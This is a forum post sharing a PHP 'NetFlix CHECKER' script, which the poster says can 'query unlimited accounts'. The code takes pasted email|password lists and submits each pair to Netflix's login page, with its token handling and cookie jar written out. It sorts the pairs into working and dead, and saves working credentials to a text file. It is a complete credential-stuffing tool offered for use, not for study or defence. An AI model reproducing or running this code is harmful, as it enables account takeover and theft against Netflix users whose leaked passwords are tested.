#1
(This post was last modified: 15 February, 2020 - 12:04 PM by Kimayu.)
Code:
We Throw It Into The Server. or if there is xampp it will work there. You can query unlimited accounts.


<?php $sock = ''; error_reporting(0); function getStr($string,$start,$end){ $str = explode($start,$string); $str = explode($end,$str[1]); return $str[0]; } class cURL { var $callback = false; function setCallback($func_name) { $this->callback = $func_name; } function doRequest($method, $url) { $ch = curl_init(); global $email, $pwd , $token; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); // curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIESESSION, false ); curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/Netflix.txt'); //COOKIES curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/Netflix.txt'); //COOKIES curl_setopt($ch, CURLOPT_REFERER, 'https://www.netflix.com/Login'); curl_setopt($ch, CURLOPT_VERBOSE, 1); if ($method == 'POST') { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'email='.$email.'&password='.$pwd.'&flow=websiteSignUp&mode=loginPassword&action=loginAction&withFields=email%2Cpassword%2CrememberMe%2CnextPage&authURL='.$token.'&nextPage=&rememberMe=true'); // LIVE REQUESST } $data = curl_exec($ch); // curl_close($ch); if ($data) { if ($this->callback) { $callback = $this->callback; $this->callback = false; return call_user_func($callback, $data); } else { return $data; } } else { return curl_error($ch); } } function get($url) { return $this->doRequest('GET', $url, 'NULL'); } function post($url) { return $this->doRequest('POST', $url); } } echo ' <DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <** **"Content-Type" content="text/html; charset=utf-8" /> <head><title>NetFlix CHECKER V1 </title> <** charset="utf-8"> <** **"X-UA-Compatible" content="IE=edge"> <** name="viewport" content="width=device-width, initial-scale=1"> <title>Example of Bootstrap 3 Panels with Contextual States</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> <style type="text/css"> .bs-example{ margin: 5px; } </style> </head> <style> { background-color:black; font-size: 9pt; font-family:Verdana; line-height:12pt; color:; } body,td,th { color:black; } h2 { color:; } h1 { padding: 10px 15px; color: red; } .main-content { width::; border-radius:; } textarea, input { border-radius:2%; } input { height:;o } .button { } .submit-button { background:green; border:solid 1px; border-radius:5px; -moz-border-radius: 50px; -webkit-border-radius: 50px; -moz-box-shadow: 0 1px 3px rgba(0,0,0,0.6); -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.6); text-shadow: 0 -1px 1px rgba(0,0,0,0.25); border-bottom: 1px solid rgba(0,0,0,0.25); position: relative; color:; color:black;border:solid 1px green; display: inline-block; cursor:pointer; font-size:13px; padding:3px 6px; height: 30px;width: 100px; } .submit-button:hover { background:green;border:solid 1px green; height: 30px;width: 100px; } #show { width: 70%;margin: auto;padding: 10px 9px; } .business{ font-weight:bold; color:green; } .premier{ font-weight:bold; color:#00FF00; } .verified{ font-weight:bold; color:; } .fieldset{ border:; margin-top:; } .tvmit_live{ border:; color:green; font-weight:bold; } .tvmit_die{ border:; color:red; font-weight:bold; } #result{ display:none; } </style> <script type="text/javascript"> function pushPaypalDie(str){ document.getElementById(\'listPaypalDie\').innerHTML += \'<div>\' + str + \'</div>\'; } function pushPaypal(str){ document.getElementById(\'listPaypal\').innerHTML += \'<div>\' + str + \'</div>\'; } function pushWrongFormat(str){ document.getElementById(\'listWrongFormat\').innerHTML += \'<div>\' + str + \'</div>\'; } </script> <head> <!-- Latest compiled and minified CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <!-- Optional theme --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"> <!-- Latest compiled and minified JavaScript --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> <** name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css"> </head> </head> <style type="text/css"> </style> <body> <body background="http://vorach.com/wp-content/uploads/2017/04/White-Wallpaper-HD-Texture-3G.jpg"> <div class="main-content"> <div class="col-xs-11" style="margin: 0px auto;float:none;"><div class="box"><div class="box-title"><h1> </i>  <center>NetFlix</center></h3> <form method="post"> <div align="center"><textarea name="mp" rows="10" style="width:90%">'; if (isset($_POST['btn-submit'])) echo $_POST['mp']; else echo 'MAIL|SİFRE'; ; echo '</textarea><br /> <br> AYİRAC: <input type="text" style="width:20px; text-align: center;" name="delim" value="'; if (isset($_POST['btn-submit'])) echo $_POST['delim']; else echo '|'; ; echo '" size="1" /><input type="hidden" name="mail" value="'; if (isset($_POST['btn-submit'])) echo $_POST['mail']; else echo 0; ; echo '" size="1" /><input type="hidden" name="pwd" value="'; if (isset($_POST['btn-submit'])) echo $_POST['pwd']; else echo 1; ; echo '" size="1" />  <input type="submit" class="btn btn-info" value="Çaliştir" name="btn-submit" /> </br>     </div> </form> '; set_time_limit(0); include("use.php"); function fetch_value($str, $find_start, $find_end) { $start = strpos($str, $find_start); if ($start === false) { return ""; } $length = strlen($find_start); $end = strpos(substr($str, $start + $length), $find_end); return trim(substr($str, $start + $length, $end)); } function fetch_value_notrim($str, $find_start, $find_end) { $start = strpos($str, $find_start); if ($start === false) { return ""; } $length = strlen($find_start); $end = strpos(substr($str, $start + $length), $find_end); return substr($str, $start + $length, $end); } $dir = dirname(__FILE__); $config['cookie_file'] = $dir . '/cookies/' . md5($_SERVER['REMOTE_ADDR']) . '.txt'; if (!file_exists($config['cookie_file'])) { $fp = @fopen($config['cookie_file'], 'w'); @fclose($fp); } $zzz = ""; $live = array(); function get($list) { preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/", $list, $socks); return $socks[0]; } function delete_cookies() { global $config; $fp = @fopen($config['cookie_file'], 'w'); @fclose($fp); } function xflush() { static $output_handler = null; if ($output_handler === null) { $output_handler = @ini_get('output_handler'); } if ($output_handler == 'ob_gzhandler') { return; } flush(); if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false) { @ob_flush(); } else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE) { @ob_end_flush(); @ob_start(); } } function curl_grab_page($site,$proxy,$proxystatus){ $chss = curl_init(); curl_setopt($chss, CURLOPT_RETURNTRANSFER, TRUE); if ($proxystatus == 'on') { curl_setopt($chss, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($chss, CURLOPT_HTTPPROXYTUNNEL, TRUE); curl_setopt($chss, CURLOPT_PROXY, $proxy); } curl_setopt($chss, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($chss, CURLOPT_URL, $site); return curl_exec($chss); curl_close ($chss); } function display($str) { echo '<div>' . $str . '</div>'; xflush(); } //function pushSockDie($str) { // echo '<script type="text/javascript">pushSockDie(\'' . $str . '\');</script>'; // xflush(); //} function pushPaypalDie($str) { echo '<script type="text/javascript">pushPaypalDie(\'' . $str . '\');</script>'; file_put_contents('api/accountsdead.txt', $str . PHP_EOL, FILE_APPEND); xflush(); } function pushPaypal($str) { echo '<script type="text/javascript">pushPaypal(\'' . $str . '\');</script>'; file_put_contents('api/accounts.txt', $str . PHP_EOL, FILE_APPEND); xflush(); } function pushWrongFormat($str) { echo '<script type="text/javascript">pushWrongFormat(\'' . $str . '\');</script>'; xflush(); } if (isset($_POST['btn-submit'])) { ; echo '<br/> <br/> <div class="panel panel-success"> <div class="panel-heading"> <h3 class="panel-title">Saglam</h3> </div> <div id="listPaypal"></div> </div> <div class="panel panel-danger"> <div class="panel-heading"> <h3 class="panel-title">pert</h3> </div> <div id="listPaypalDie"></div> </div> <br/> '; xflush(); $emails = explode("\n", trim($_POST['mp'])); $eCount = count($emails); $failed = $live = $uncheck = array(); $checked = 0; if (!count($emails)) { continue; } delete_cookies(); //$sockClear = isSockClear(); //if ($sockClear != 1) { //pushSockDie('[<font color="#FF0000">' . $sock . '</font>]'); //continue; //} foreach ($emails AS $k => $line) { $info = explode($_POST['delim'], $line); $email = trim($info["{$_POST['mail']}"]); $pwd = trim($info["{$_POST['pwd']}"]); if (stripos($email, '@') === false || strlen($pwd) < 2) { unset($emails[$k]); pushWrongFormat($email . ' | ' . $pwd); continue; } //if ($failed[$sock] > 4) // continue; if(file_exists(getcwd().'/Netflix.txt')) { unlink(getcwd().'/Netflix.txt'); } $a = new cURL(); $b = $a->get("https://www.netflix.com/Login");//CHAMADA TOKEN $token = getStr($b,'type="hidden" name="authURL" value="','"'); //CHAMADA TOKEN $c = new cURL(); $d = $c->post("https://www.netflix.com/Login"); //POST DA 2 CHAMADA $h = new cURL(); $e = $h->get("https://www.netflix.com/YourAccount"); $checked++; if($d){ if (stristr($e,'esquecer') !== false) { $nome = getStr($e,'class="profile-name" data-reactid="235">','</span>'); $numero = getStr($e,'class="msgContent">','</section>'); // Verificar se a conta tem numero registrado $xyz = "<b style=\"color:green\">Lived => </b>|<b style=\"color:black\"> $email | $pwd | </b><b style=\"color:green\"> # NETFLİX CHECKER T1 #</b><b style=\"color:blue\">|SEM TELEFONE|</b> "; $live[] = $xyz; unset($emails[$k]); pushPaypal($xyz); } else if (stristr($d,'Adicionar perfil') !== false) {// RESULTADO DO LIVE. $xyz = "<b style=\"color:green\">Lived => </b>|<b style=\"color:black\"> $email | $pwd |</b><b style=\"color:green\"> # NETFLİX CHECKER T1#</b> "; $live[] = $xyz; unset($emails[$k]); pushPaypal($xyz); } else{ pushPaypalDie("<b style=\"color:red\">pert => </b>|<b style=\"color:black\"> $email | $pwd | </b><b style=\"color:red\"> # NETFLİX CHECKER T1 #</b> "); unset($emails[$k]); } } } } //if (isset($eCount, $live)) { // display("<h3>Total: $eCount - Testado: $checked - Aprovado: " . count($live) . "</h5>"); // display(implode("<br />", $live)); if (count($emails)) { display("Sem Testar:"); display('<textarea cols="80" rows="10">' . implode("\n", $emails) . '</textarea>'); } echo '</body> </html>';